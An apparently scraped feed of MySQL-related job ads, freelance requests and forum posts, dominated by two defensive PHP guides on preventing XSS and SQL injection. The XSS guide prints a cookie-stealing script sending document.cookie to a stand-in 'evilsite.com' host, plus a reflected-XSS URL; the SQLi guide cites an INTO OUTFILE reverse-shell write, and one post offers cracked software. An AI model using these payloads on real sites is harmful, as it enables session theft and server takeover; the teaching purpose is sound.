+ Experience with application development or software engineering experience in developing web-based applications. + Experience with MS Report Builder, MySQL, and database management software. + Server and database administration for virtual appliances, Linux and windows 10 desktop + Build virtual servers & provide technical configuration, setup, installation services, hardware and coordination of application projects. 
+ General knowledge of VMware Work hours: Eight hour workday, core hours are 9:30am to 2:30pm; may be extended hours requirements Work location: Herndon, VA Job Location US-Reston-VA-VIRGINIA SUBURBAN CACI employs a diverse range of talent to create an environment that fuels innovation and fosters continuous improvement and success. At CACI, you will have the opportunity to make an immediate impact by providing information solutions and services in support of national security missions and government transformation for Intelligence, Defense, and Federal Civilian customers. CACI is proud to provide dynamic careers for employees worldwide. CACI is an Equal Opportunity Employer - Females/Minorities/Protected Veterans/Individuals with Disabilities.
          Full-Stack Developer - Angular2, PHP, MySQL - (Salary DOE)
TX-Dallas, Job title: Full-Stack Software Developer Job Location: Dallas, TX Required Skills: Angular2, PHP, and MySQL Salary: Depending on experience (DOE) Located in beautiful Dallas, TX, we are one of the leading cloud based digital business management firm in TX. Due to growth and ongoing and future projects, we are looking to hire for a talented Full-Stack Software Developer to join our team. This perso
          Help or image manipulation class php?

I'm really having a tough time trying to upload images using PHP and MySQL, and I really need help!

This is what I want to do, in natural language:

1. Upload an image
2. Check if the format is okay (png, jpeg, gif)
3. Rename the image file so there's no ambiguity, in this format (e.g. pic-$userid.gif)
4. Upload the pic to the images/ folder
5. Delete the old one, or remove the default picture set on registration

I'm trying to look for resources online, but can't seem to find any! Thanks :)

If you have the patience, I think that looking into these guys code is the best way to go: http://www.verot.net/php_class_upload.htm

Or, why not, just use their class. It will save you from a lot of headache and help you reach your goal faster.

Cheers!
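For reference, a minimal sketch of the flow described in the question (the `avatar` field name, `images/` directory, and session key are placeholders — a production app should use a vetted library such as the class linked above):

```php
<?php
// Sketch of a safe-ish image upload flow. Assumes an HTML form with
// enctype="multipart/form-data" and a file input named "avatar",
// plus an active session holding the user's id.
session_start();

// Map of accepted real MIME types to the extension we will store.
$allowed = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];

if (!isset($_FILES['avatar']) || $_FILES['avatar']['error'] !== UPLOAD_ERR_OK) {
    exit('Upload failed');
}

// Step 2: check the actual file contents (never trust the client-sent type).
$finfo = new finfo(FILEINFO_MIME_TYPE);
$mime  = $finfo->file($_FILES['avatar']['tmp_name']);
if (!isset($allowed[$mime])) {
    exit('Only PNG, JPEG, and GIF are accepted');
}

// Step 3: rename to an unambiguous, user-derived name, e.g. pic-42.png.
$userId  = (int) $_SESSION['user_id'];
$newName = sprintf('pic-%d.%s', $userId, $allowed[$mime]);

// Step 5: delete any previous picture for this user.
foreach (glob(sprintf('images/pic-%d.*', $userId)) as $old) {
    unlink($old);
}

// Step 4: move the upload into the images/ folder.
move_uploaded_file($_FILES['avatar']['tmp_name'], 'images/' . $newName);
```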


          Websocket function like UBER
99% app complete. we need to develop only the websocket function like UBER for smooth icon movement and integrate few APIs to frontend and very minor modification of UI. Budget around (Budget: $30 - $250 SGD, Jobs: Android, Java, Javascript, MySQL, node.js)
          UI Developer in Egypt
UI Developer Position: UI Developer Location: remote work / home Experience: 3 Years Desired Candidate Profile: B.Tech / B.E. / MCA Responsibilities • Responsible for meeting expectations and deliverables on time and in high quality. • Responsible for the development of web applications and components. • Responsible for the design and development of web pages, graphics, multimedia, GUIs. • Demonstrates creative, technical and analytical skills. • Demonstrates ability to communicate effectively in both technical and business environments. Requirements • Well-versed with languages like HTML, CSS, Javascript, Bootstrap. • Front-end skills and basic understanding of how back-end development works. • Solid understanding of UX and UI design with an emphasis on maximizing usability • Key Skills :PHP, Javascript, JQuery, MySQL, HTML, Bootstrap, CSS, Ajax • Effective time management and coordination skills • English / Arabic language • Typing speed 30+ WPM • Remote employees are required to work in a quiet room with a door, and are not permitted to be a primary caregiver for a child or infirmed person, or doing side work, during the work hours.
          Java Lead Developer / Team Leader - AWS
Java Lead Developer with hands-on Java Development and experience of leading a team in the UK and abroad to join an organisation at the forefront of Mobile web and mobile billing. The organisation has a diverse range of products across SAAS, e-commerce and B2B products. The organisation has just moved to modern new offices in South London with great views from the roof terrace. The Java Team Lead will have some of the following skills; Hands-on Java, AWS, Web Services, Spring, Hibernate, MongoDB, MS SQL, MySQL, Cloud data migration etc. Familiarity with DevOps concepts Experience with AWS cloud architecture in an enterprise environment Knowledge of cloud data stores - S3, Dynamo DB and / or Amazon RDS Strong experience of Amazon Web Services, e.g. VPC, Direct Connect, RDS, Lamda etc Experience with infrastructure and Cloud Migration. This is a long term contract with an initial period of 6 Months. Please forward your CV urgently.
          Cronjob demo test

Won’t post the script here for security reasons.

Hint:

cp backup demo
mysql demo_db < demo-backup.sql

          Installation Error v2.0.0-alpha.1

Try checking whether you have PHP 7 and whether you typed /index.php/setup.
The DB can only be MySQL.


          Unity: MySQL Database Management (Video Course)
Title: Unity: MySQL Database Management (Video Course)
Author: Armin Sarajlic
Publisher: Udemy
Year: 2018
Video: H264 MP4 AVC, 1280x720
Audio: AAC 48000 KHz 2 Ch
Duration: 01:18:00
Size: 496 MB
Language: English

Create a Login & Registration system for your game in 1 hour!
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Need a Gym Management System
I need a Gym Management System that has barcode check-in and check-out implemented, and that can manage emailing and internal gym operations. (Budget: $30 - $250 USD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          To modify Openbravo Java-based ERP
I am looking for a Java programmer to modify Openbravo, the Java-based open-source ERP — some work on the mobile app, report printing, or the SQL database program. (Budget: $30 - $250 USD, Jobs: Database Programming, Java, MySQL, Software Architecture)
          Head of Web developer / Development Manager - AL REEM INT CONSTRUCTION - Abu Dhabi
*Design, develop, and debug PHP based applications(In MVC, core PHP, CakePHP), with MySQL database as backend.* *Enhance user experience of existing systems...
From Indeed - Tue, 25 Sep 2018 04:27:43 GMT - View all Abu Dhabi jobs
          Fix control form on WP
We have a problem with phone data on the form7 plugin. Data is sent correctly by email, but validation for payment doesn't work (the phone format doesn't accept blank characters). 1) User fills the form = ok 2) WP redirect... (Budget: €8 - €30 EUR, Jobs: HTML, Javascript, MySQL, PHP, WordPress)
          RDS MySQL DB - how to disable have_ssl and have_openssl
I have provisioned MySQL DB 5.6.40 and it has two system variables "have_ssl" and "have_openssl" enabled.
...
          Everything You Need to Know About Preventing Cross-Site Scripting Vulnerabilities

Cross-Site Scripting (abbreviated as XSS) is a class of security vulnerability whereby an attacker manages to use a website to deliver a potentially malicious JavaScript payload to an end user.

XSS vulnerabilities are very common in web applications. They're a special case of code injection attack; except where SQL injection, local/remote file inclusion, and OS command injection target the server, XSS exclusively targets the users of a website.

There are two main varieties of XSS vulnerabilities we need to consider when planning our defenses:

Stored XSS occurs when data you submit to a website is persisted (on disk or in RAM) across requests, usually with the goal of executing when a privileged user accesses a particular web page.

Reflective XSS occurs when a particular page can be used to execute arbitrary code, but it does not persist the attack code across multiple requests. Since an attacker needs to send a user to a specially crafted URL for the code to run, reflective XSS usually requires some social engineering to pull off.

Cross-Site Scripting vulnerabilities can be used by an attacker to accomplish a long list of potential nefarious goals, including:

- Steal your session identifier so they can impersonate you and access the web application.
- Redirect you to a phishing page that gathers sensitive information.
- Install malware on your computer (usually requires a 0day vulnerability for your browser and OS).
- Perform tasks on your behalf (i.e. create a new administrator account with the attacker's credentials).

Cross-Site Scripting represents an asymmetry in the security landscape. These vulnerabilities are incredibly easy for attackers to exploit, but XSS mitigation can become a rabbit hole of complexity depending on your project's requirements.

Brief XSS Mitigation Guide

1. If your framework has a templating engine that offers automatic contextual filtering, use that. Make sure you use the appropriate context flags (e.g. url, html_attr, html). Context matters to XSS prevention.
2. echo htmlentities($string, ENT_QUOTES | ENT_HTML5, 'UTF-8'); is a safe and effective way to stop all XSS attacks on a UTF-8 encoded web page, but doesn't allow any HTML.
3. If your requirements allow you to use e.g. Markdown instead of HTML, do that.
4. If you need to allow some HTML and aren't using a templating engine (see #1), use HTML Purifier.
5. For user-provided URLs, you additionally want to only allow http: and https: schemes; never javascript:. Furthermore, URL encode any user input.
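To illustrate the point about user-provided URLs, here is one way an http:/https: scheme allowlist might look (a sketch only — the helper name and fallback value are our own, not part of any standard API):

```php
<?php
/**
 * Return the URL escaped for an HTML attribute, but only if it uses an
 * http: or https: scheme; otherwise return a harmless fallback.
 * Sketch: rejects javascript:, data:, and other dangerous schemes.
 */
function safeUrl(string $url, string $fallback = '#'): string
{
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        return $fallback;
    }
    // Escape for use inside an HTML attribute value
    return htmlentities($url, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

echo '<a href="', safeUrl($_GET['website'] ?? ''), '">homepage</a>';
```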

The rest of this document explains cross-site scripting vulnerabilities and their mitigation strategies in detail.

What Does a XSS Vulnerability Look Like?

XSS vulnerabilities can occur in any place where information which can be altered by any user is included in the output of a webpage without being properly escaped.

Example 1

<div id="profile"><?php echo $user['profile']; ?></div>

This is a potential stored XSS infection point (assuming the profile field was pulled straight from the database without escaping). If the malicious user is able to include a snippet that looks like this, they can exploit any authenticated user that visits their profile and steal their cookies for future impersonation efforts:

<script> window.open("http://evilsite.com/cookie_stealer.php?cookie=" + document.cookie, "_blank"); </script> Example 2 <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">

The above snippet is vulnerable to reflective XSS attacks. Just trick a user into visiting /form.php?%22%20onload%3D%22alert(%27XSS%27)%3B and they will see an alert box pop up containing the message 'XSS' when your page loads.

<form action="/form.php?" onload="alert('XSS');" method="post">

Unlike SQL Injection, which prepared statements defeat 100% of the time, cross-site scripting doesn't have an industry standard strategy for separating data from instructions. You have to escape special characters to prevent attacks.

The Quick and Dirty XSS Mitigation Technique for PHP Applications

The simplest and most effective way to prevent XSS attacks is the nuclear option: Ruthlessly escape any character that can affect the structure of your document.

For best results, you want to use the built-in htmlentities() function that PHP offers instead of playing with string escaping yourself.

<?php
/**
 * Escape all HTML, JavaScript, and CSS
 *
 * @param string $input The input string
 * @param string $encoding Which character encoding are we using?
 * @return string
 */
function noHTML($input, $encoding = 'UTF-8')
{
    return htmlentities($input, ENT_QUOTES | ENT_HTML5, $encoding);
}

echo '<h2 title="', noHTML($title), '">', noHTML($articleTitle), '</h2>', "\n";
echo noHTML($some_data), "\n";

The security of this construction depends on the presence of the ENT_QUOTES flag when escaping HTML attribute values. It's important to note that this prevents any HTML characters in $some_data from being rendered as markup on the web page.

Why ENT_QUOTES | ENT_HTML5 and 'UTF-8'?

We specify ENT_QUOTES to tell htmlentities() to escape quote characters ( " and ' ). This is helpful for situations such as:

<input type="text" name="field" value="<?php echo $escaped_value; ?>" />

If you fail to specify ENT_QUOTES, an attacker simply needs to pass " onload="malicious javascript code as a value to that form field and presto, instant client-side code execution.

We specify ENT_HTML5 and 'UTF-8' so htmlentities() knows what character set and version of the HTML standard to work with.

The reason we need to specify both values is, as demonstrated against mysql_real_escape_string() , an incorrect (especially attacker-controlled) character encoding can defeat string-based escaping strategies.

For the sake of safety and consistency, the encoding we specify here, the encoding sent in the charset attribute of the <meta> tag, and the charset added to the Content-Type HTTP header should all match.
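One simple way to keep all three in sync is to declare the encoding once and reference it everywhere (a sketch; the constant name is our own):

```php
<?php
// Keep a single encoding constant and use it everywhere the charset matters.
const APP_CHARSET = 'UTF-8';

// 1. The Content-Type HTTP header
header('Content-Type: text/html; charset=' . APP_CHARSET);

// 2. Every escaping call
$untrusted = $_GET['comment'] ?? '';
$safe = htmlentities($untrusted, ENT_QUOTES | ENT_HTML5, APP_CHARSET);

// 3. The charset attribute of the <meta> tag
echo '<meta charset="', APP_CHARSET, '">', "\n";
echo '<p>', $safe, '</p>', "\n";
```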

Important - Avoid Premature Optimization

Always escape data on output (when displaying to a user).

Do not escape user input against XSS attacks before inserting into a database. WordPress made this mistake, and eventually security researcher Jouko Pynnönen of Klikki Oy realized MySQL column truncation can defeat before-insert XSS prevention strategies.

You should still be validating your input, however. If you're expecting an email address, make sure it's formatted like one.

$email = filter_var($_POST['email'], FILTER_VALIDATE_EMAIL);
          Preventing SQL Injection in PHP Applications - the Easy and Definitive Guide

SQL Injection is a technique for taking control of a database query and often results in a compromise of confidentiality. In some cases (e.g. if SELECT 'evil code here' INTO OUTFILE '/var/www/reverse_shell.php' succeeds) this can result in a complete server takeover.

Since code injection (which encompasses SQL, LDAP, OS Command, and XPath Injection techniques) has consistently remained on top of the OWASP Top Ten vulnerabilities, it's a popular topic for bloggers trying to get their feet wet in the application security field.

While more people sharing knowledge about application security is a good thing, unfortunately much of the advice circulating on the Internet (especially on ancient blog posts that rank high on search engines) is outdated, unintentionally misleading, and often dangerous.

How to Prevent SQL Injection (Almost) Every Time, Guaranteed*

Use Prepared Statements, also known as parametrized queries . For example:

/**
 * Note: This code is provided for demonstration purposes.
 * In general, you want to add some application logic to validate
 * the incoming parameters. You do not need to escape anything.
 */
$stmt = $pdo->prepare('SELECT * FROM blog_posts WHERE YEAR(created) = ? AND MONTH(created) = ?');
if ($stmt->execute([$_GET['year'], $_GET['month']])) {
    $posts = $stmt->fetchAll(\PDO::FETCH_ASSOC);
}

Prepared Statements eliminate any possibility of SQL Injection in your web application. No matter what is passed into the $_GET variables here, the structure of the SQL query cannot be changed by an attacker (unless, of course, you have PDO::ATTR_EMULATE_PREPARES enabled, which means you're not truly using prepared statements).

Note: If you attempt to turn PDO::ATTR_EMULATE_PREPARES off, some versions of some database drivers might ignore you. To be extra cautious, explicitly set the character set in the DSN to one your application and database both use (e.g. UTF-8, which, if you're using MySQL, is confusingly called utf8mb4).
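Putting those precautions together, a connection might be set up like this (the hostname, database name, and credentials are placeholders):

```php
<?php
// Explicit charset in the DSN, and emulated prepares turned off, so the
// query text and the parameters travel to MySQL in separate packets.
$pdo = new \PDO(
    'mysql:host=localhost;dbname=myapp;charset=utf8mb4', // placeholders
    'username',
    'password',
    [
        \PDO::ATTR_EMULATE_PREPARES => false,
        \PDO::ATTR_ERRMODE          => \PDO::ERRMODE_EXCEPTION,
    ]
);
```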

Prepared Statements solve a fundamental problem of application security: They separate the data that is to be processed from the instructions that operate on said data by sending them in completely separate packets. This is the same fundamental problem that makes stack/heap overflows possible.

As long as you never concatenate user-provided or environment variables with the SQL statement(and make sure you aren't using emulated prepares) you can for all practical purposes cross SQL injection off your checklist forever.

Important Caveat and Clarification*

Prepared statements secure the interactions between your web application and your database server (if they're on separate machines, they should also be communicating over TLS). It's still possible that an attacker could store a payload in a field that could be dangerous in, for example, a stored procedure. We call this a higher-order SQL injection (the linked Stack Overflow answer refers to them as "second-order", but anything after the initial query is executed should be a target for analysis).

In this situation, our advice would be not to write stored procedures such that they create higher-order SQL injection points.

What About Sanitizing Input?

Many people have seen this 2007 comic from XKCD about SQL Injection exploits. It's frequently cited or included in security conference talks, especially ones addressed to newcomers. The comic has done a lot of good raising awareness of the dangers of user input in database queries, but its advice to sanitize your database inputs is, by a 2015 understanding of the issues involved, only a half-measure.

You're Likely Better Off Forgetting About Sanitizing Input (in Most Cases)

While it's possible to prevent attacks by rewriting the incoming data stream before you send it to your database driver, it's rife with dangerous nuance and obscure edge-cases . (Both links in the previous sentence are highly recommended.)

Unless you want to take the time to research and attain complete mastery over every Unicode format your application uses or accepts, you're better off not even trying to sanitize your inputs. Prepared statements are more effective at preventing SQL injection than escaping strings.

Furthermore, altering your incoming data stream can cause data corruption, especially if you are dealing with raw binary blobs (e.g. images or encrypted messages).

Prepared statements are easier and can guarantee SQL Injection prevention.

If user input never has the opportunity to alter the query string, it can never lead to code execution. Prepared statements completely separate code from data.

XKCD's author Randall Munroe is a smart cookie. If this comic were being written today, the hacker mom character probably would have said this instead:


[Image: a modified version of the comic]
Input Should Still Be Validated

Validation is not the same thing as sanitization. Prepared statements can prevent SQL injection, but they cannot save you from bad data. For most cases, filter_var() is useful here.

$email = filter_var($_POST['email'], FILTER_VALIDATE_EMAIL);
if (empty($email)) {
    throw new \InvalidArgumentException('Invalid email address');
}

Note: filter_var() validates that the given email address string conforms to the RFC specification. It does not guarantee that there is an open inbox at that address, nor does it check that the domain name is registered. A valid email address is still not safe to use in raw queries, nor to display on a web page without filtering to prevent XSS attacks.
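The same filter_var() approach works for other input types. For instance, a hypothetical numeric ID parameter can be validated and range-checked before it ever reaches a query:

```php
<?php
// '42' stands in for user input such as $_GET['id'].
$raw = $_GET['id'] ?? '42';

// FILTER_VALIDATE_INT returns the integer on success, or false otherwise.
$id = filter_var($raw, FILTER_VALIDATE_INT, [
    'options' => ['min_range' => 1],
]);

if ($id === false) {
    throw new InvalidArgumentException('Invalid ID');
}
echo $id, "\n"; // 42
```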

What About Column and Table Identifiers?

Since column and table identifiers are part of the query structure, you cannot parameterize them. Consequently, if the application you are developing requires a dynamic query structure where tables or columns are selected by the user, you should opt for a whitelist.

A whitelist is an application logic strategy that explicitly only allows a few accepted values and either rejects the rest or uses a sane default. Contrast it with a blacklist, which only forbids known-bad inputs. In most cases, whitelists are better for security than blacklists.

$qs = 'SELECT * FROM photos WHERE album = ?';
// Use switch-case for an explicit whitelist
switch ($_POST['orderby']) {
    case 'name':
    case 'exifdate':
    case 'uploaded':
        // These strings are trusted and expected
        $qs .= ' ORDER BY ' . $_POST['orderby'];
        if (!empty($_POST['asc'])) {
            $qs .= ' ASC';
        } else {
            $qs .= ' DESC';
        }
        break;
    default:
        // Some other value was passed. Let's just order by photo ID in descending order.
        $qs .= ' ORDER BY photoid DESC';
}
$stmt = $db->prepare($qs);
if ($stmt->execute([$_POST['album_id']])) {
    $photos = $stmt->fetchAll(\PDO::FETCH_ASSOC);
}

If you're allowing the end user to provide the table and/or column names, because identifiers cannot be parameterized, you still must resort to escaping. In these situations, we recommend the following:

Don't: just escape SQL meta characters (e.g. ').
Do: filter out every character that isn't allowed.

The following code snippet will only allow table names that begin with an uppercase or lowercase letter, followed by any number of alphanumeric characters and underscores.

if (!preg_match('/^[A-Za-z][A-Za-z0-9_]*$/', $table)) {
    throw new AppSpecificSecurityException("Possible SQL injection attempt.");
}
// And now you can safely use it in a query:
$stmt = $pdo->prepare("SELECT * FROM {$table}");
if ($stmt->execute()) {
    $results = $stmt->fetchAll(PDO::FETCH_ASSOC);
}

What if Using Prepared Statements Seems Too Cumbersome?

The first time a developer encounters prepared statements, they can feel frustrated about the prospect of being forced to write a lot of redundant code (prepare, execute, fetch; prepare, execute, fetch; ad nauseam).

Thus, the team at Paragon Initiative Enterprises wrote a PHP library called EasyDB.

How to Use EasyDB

There are two ways to start using EasyDB in your code:

1. You can use EasyDB to wrap your existing PDO instances.
2. If you're familiar with PDO constructors, you can pass the same arguments to \ParagonIE\EasyDB\Factory::create() instead.

// First method:
$pdo = new \PDO(
    'mysql:host=localhost;dbname=something',
    getenv('MYSQL_USERNAME'),
    getenv('MYSQL_PASSWORD')
);
$db = new \ParagonIE\EasyDB\EasyDB($pdo);

// Second method:
$db = \ParagonIE\EasyDB\Factory::create(
    'mysql:host=localhost;dbname=something',
    getenv('MYSQL_USERNAME'),
    getenv('MYSQL_PASSWORD')
);

(The use of getenv() is best supplemented with a library such as phpdotenv.)

Once you have an EasyDB object, you can begin leveraging its simplified interface to quickly develop secure database-aware applications. Some examples include:

Safe Database Querying with Prepared Statements

/**
 * As mentioned previously, you should perform validation on all input.
 * Not necessarily for security reasons, but because well-designed software
 * validates all user-supplied input and informs them how to correct it.
 *
 * For the sake of easy auditing, you probably don't want to pass $_GET,
 * $_POST, or other superglobals. Instead, validate and store the results
 * in a local variable.
 */
$data = $db->safeQuery(
    'SELECT * FROM transactions WHERE type = ? AND amount >= ? AND date >= ?',
    [
        $_POST['ttype'],
        $_POST['minimum'],
        $_POST['since']
    ]
);

Select many rows from a database table

/**
 * Although safe from SQL injection, this example snippet does not
 * validate its input. In real applications, please check that any data
 * your script is given is valid.
 */
$rows = $db->run(
    'SELECT * FROM comments WHERE blogpostid = ? ORDER BY created ASC',
    $_GET['blogpostid']
);
foreach ($rows as $row) {
    $template_engine->render('comment', $row);
}

Select one row from a database table

/**
 * Although safe from SQL injection, this example snippet does not
 * validate its input. In real applications, please check that any data
 * your script is given is valid.
 */
$userData = $db->row(
    "SELECT * FROM users WHERE userid = ?",
    $_GET['userid']
);

Insert a new row into a database table

/**
 * Although safe from SQL injection, this example snippet does not
 * validate its input. In real applications, please check that any data
 * your script is given is valid.
 */
$db->insert('comments', [
    'blogpostid' => $_POST['blogpost'],
    'userid' => $_SESSION['user'],
    'comment' => $_POST['body'],
    'parent' => isset($_POST['replyTo']) ? $_POST['replyTo'] : null
]);

NEW: Dynamic Queries with EasyStatement

If you're using EasyDB 1.2.0 or 2.2.0 (or newer), you can use the new EasyStatement API (provided by Woody Gilk) to generate dynamic queries.

$statement = EasyStatement::open()
    ->with('last_login IS NOT NULL');

if (strpos($_POST['search'], '@') !== false) {
    // Perform an email search
    $statement->orWith('email = ?', $_POST['search']);
} else {
    // Perform a username search
    $statement->orWith('username LIKE ?', '%' . $db->escapeLikeValue($_POST['search']) . '%');
}

// The statement can compile itself to a string with placeholders
// (here, for the username branch):
echo $statement;
/* last_login IS NOT NULL OR username LIKE ? */

// All the values passed to the statement are captured and can be used for querying:
$user = $db->single("SELECT * FROM users WHERE $statement", $statement->values());

The EasyStatement API supports variable arguments (x IN (1, 2, 3)):

// Statements also handle translation for IN conditions with variable arguments,
// using a special ?* placeholder:
$roles = [1];
if ($_GET['with_managers']) {
    $roles[] = 2;
}
$statement = EasyStatement::open()->in('role IN (?*)', $roles);

// The ?* placeholder is replaced by the correct number of ? placeholders:
echo $statement;
/* role IN (?, ?) */

// And the values will be unpacked accordingly:
print_r($statement->values());
/* [1, 2] */

Finally, with EasyStatement, you can also group conditions together:

// Statements can also be grouped when necessary:
$statement = EasyStatement::open()
    ->group()
        ->with('subtotal > ?')
        ->andWith('taxes > ?')
    ->end()
    ->orGroup()
        ->with('cost > ?')
        ->andWith('cancelled = 1')
    ->end();

echo $statement;
/* (subtotal > ? AND taxes > ?) OR (cost > ? AND cancelled = 1) */

Despite the dynamic nature of the above queries, prepared statements are being used consistently.

Escape an Identifier (Column/Table/View Names) for Dynamic Queries

The new EasyStatement API should be preferred over doing this manually.

$whiteListOfColumnNames = ['username', 'email', 'last_name', 'first_name'];
$qs = 'SELECT * FROM some_table';
$and = false;
// Drop any columns that aren't whitelisted up front, so that the
// placeholders stay aligned with the values passed to run() below:
$where = \array_intersect_key($where, \array_flip($whiteListOfColumnNames));
if (!empty($where)) {
    $qs .= ' WHERE ';
    foreach (\array_keys($where) as $column) {
        if ($and) {
            $qs .= ' AND ';
        }
        $qs .= $db->escapeIdentifier($column) . ' = ?';
        $and = true;
    }
}
$qs .= ' ORDER BY rowid DESC';

// And then to fetch some data
$data = $db->run($qs, \array_values($where));

Caution: The escapeIdentifier() method is meant for this very specific use-case of escaping field and table names and should not be used for escaping user input.

Can I Use EasyDB to Satisfy Business Needs?

Yes. We have chosen to release EasyDB under a very permissive license (MIT) because we wish to promote the adoption of better security practices in the community at large. Feel free to use EasyDB in any of your projects, even commercial ones. You don't owe us anything.

Should I use EasyDB over an ORM or Component of My Framework?

If you're already using tools that you're comfortable with that provide secure defaults (e.g. most modern PHP frameworks), don't drop them in favor of EasyDB. Easy doesn't mean "fits all use cases".

If you're using a CMS that doesn't follow security best practices, you should solve the problem upstream by getting the CMS to adopt non-emulated prepared statements.

PHP- and PDO-Specific Recommendations

If you are a PHP developer looking to get the most out of PDO, and you don't want to add EasyDB to your project, we recommend changing two of the default settings:

1. Turn off emulated prepares. This ensures you get actual prepared statements.
2. Set error mode to throw exceptions. This saves you from having to check the result of PDOStatement::execute() and makes your code less redundant.

$pdo = new PDO(/* Fill in the blank */);
$pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

Because PDO::ATTR_EMULATE_PREPARES is set to false, we're getting real prepared statements, and because we've set PDO::ATTR_ERRMODE to PDO::ERRMODE_EXCEPTION, instead of this...

$stmt = $pdo->prepare("SELECT * FROM foo WHERE first_name = ? AND last_name = ?");
if ($stmt->execute([$_GET['first_name'], $_GET['last_name']])) {
    $users = $stmt->fetchAll(PDO::FETCH_ASSOC);
} else {
    // Handle error here.
}
$args = [
    json_encode($_GET),
    (new DateTime())->format('Y-m-d H:i:s')
];
$insert = $pdo->prepare("INSERT INTO foo_log (params, time) VALUES (?, ?);");
if (!$insert->execute($args)) {
    // Handle error here.
}

...you can just write your code like this:

try {
    $stmt = $pdo->prepare("SELECT * FROM foo WHERE first_name = ? AND last_name = ?");
    $stmt->execute([$_GET['first_name'], $_GET['last_name']]);
    $users = $stmt->fetchAll(PDO::FETCH_ASSOC);

    $args = [
        json_encode($_GET),
        (new DateTime())->format('Y-m-d H:i:s')
    ];
    $pdo->prepare("INSERT INTO foo_log (params, time) VALUES (?, ?);")
        ->execute($args);
} catch (PDOException $ex) {
    // Handle error here.
}

Better security, brevity, and better readability. What more could you ask for?

Let's Make Secure the Norm

It's up to us software developers to make the applications we develop secure from malicious actors. We're the ones on the front lines (with our system administrators, when we don't also fulfill that role) defending against zero-day vulnerabilities.

Not the politicians. Not the Anti-Virus vendors. Not the forensic investigators.

Security starts with the developers.

Paragon Initiative Enterprises develops tools and platforms designed to be secure by default to reduce the cognitive load on our clients and peers. We share a lot of our innovations (both big and small) with the community through our GitHub organization. We offer technology consultation services for companies that lack comparable expertise or are otherwise concerned about the security of their network or their platform.

In the coming weeks, we will be discussing other common security vulnerabilities that suffer from the proliferation of bad or useless advice, as well as some projects in the works. We challenge other library and framework developers to take some time to consider design strategies for their own projects that make it easier to do things the secure way than to do things the insecure way. Shoot us an email if you need help.

Update

We've updated this post to reflect suggestions from three members of the PHP developer community, @htimoh, @enygma, and @suckup_de, to explain identifier escaping and input validation.


          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          SoftoRooM -> Exportizer Pro 7.0.2      Cache   Translate Page      
PRYANIK:
Твой софтовый форум: SoftoRooM
Exportizer Pro 7 0.2 + crack (patch)


Цитата( Exportizer Pro 7 0 2 ):
    Improvements in interface when working with MySQL, PostgreSQL, SQLite and SQL Server databases.
    Minor changes.


медицина в комплекте
Скрытый текст!
Подробности на форуме...

Exportizer Pro 7.0.2
источник: www.softoroom.net

          新书推荐 | 网络攻防实战研究:漏洞利用与提权 - 安全客,安全资讯平台      Cache   Translate Page      

点击购买《网络攻防实战研究:漏洞利用与提权》

2018最后一个法定节假日已经过完了,距离2018结束你的余额仅仅还有82天。最新公布的中国锦鲤也不是你,勉强称自己是中国咸鱼罢了。不知道现在你内心是不是这么想的:“反正2018也就这样了,还剩下两个多月的时间,这剩下的时间也做不了什么事,不如干脆放开玩,等2019再努力~ ”

image

是不是感觉哪里有一丝丝不对,是的。因为2018还没有结束啊!

剩下最后两个月的时间,除了放肆玩耍~也应该尝试做一个有逼格的安全知识分子来等待2018的结束,即使被人诟病,也可以随手拿出一本书说,看!我怎么可能啥也没干,我利用了最后的两个月深刻的充实了自己,把握住最后的时光自我升华,得道升天,哦不,进行知识的渗透式填充以及理想和精神境界的利用提权。

image

那么!到了最关键的选择时刻,究竟什么样的书才能充分展现你的个人的光辉呢!

就! 是!他!

本书营造了在案例中学习漏洞利用与提权技术的实战环境,涵盖了Windows及Linux的漏洞利用与安全防范,以及MSSQL、MySQL、Oracle、Metasploit和Serv-U、Winmail、Radmin、pcAnywhere、JBoss、Struts、JspRun、Gene6 FTP Server、Tomcat、Citrix、VNC、ElasticSearch、Zabbix等的漏洞利用与提权,每一节介绍一个典型应用,为网络攻防打下了坚实基础。

内容简介

本书主要讨论目前常见的漏洞利用与提权技术,分别从攻击和防御的角度介绍渗透过程中相对最难,同时又是渗透最高境界的部分——如何获取服务器乃至整个网络的权限。本书共分9章,由浅入深,按照读者容易理解的方式对内容进行分类,每一节介绍一个典型应用,同时结合案例进行讲解,并给出一些经典的总结。本书的目的是介绍漏洞利用与提权技术,结合一些案例来探讨网络安全,从而远离黑客的威胁。通过本书的学习,读者可以快速了解和掌握主流的漏洞利用与提权技术,加固自己的服务器。

本书既可以作为政府、企业网络安全从业者的参考资料,也可以作为大专院校信息安全学科的教材。

作者简介

主编介绍

祝烈煌 北京理工大学计算机学院副院长,教授,博士生导师。教育部新世纪优秀人才,中国网络空间安全协会理事,中国人工智能学会智能信息网络专委会主任委员,中国计算机学会YOCSEF副主席。长期从事网络与信息安全方面的研究工作,承担国家重点研发计划课题、国家自然科学基金等科研项目10余项。出版外文专著1本,发表SCI/EI检索学术论文100余篇,获省部级科技奖励1项。

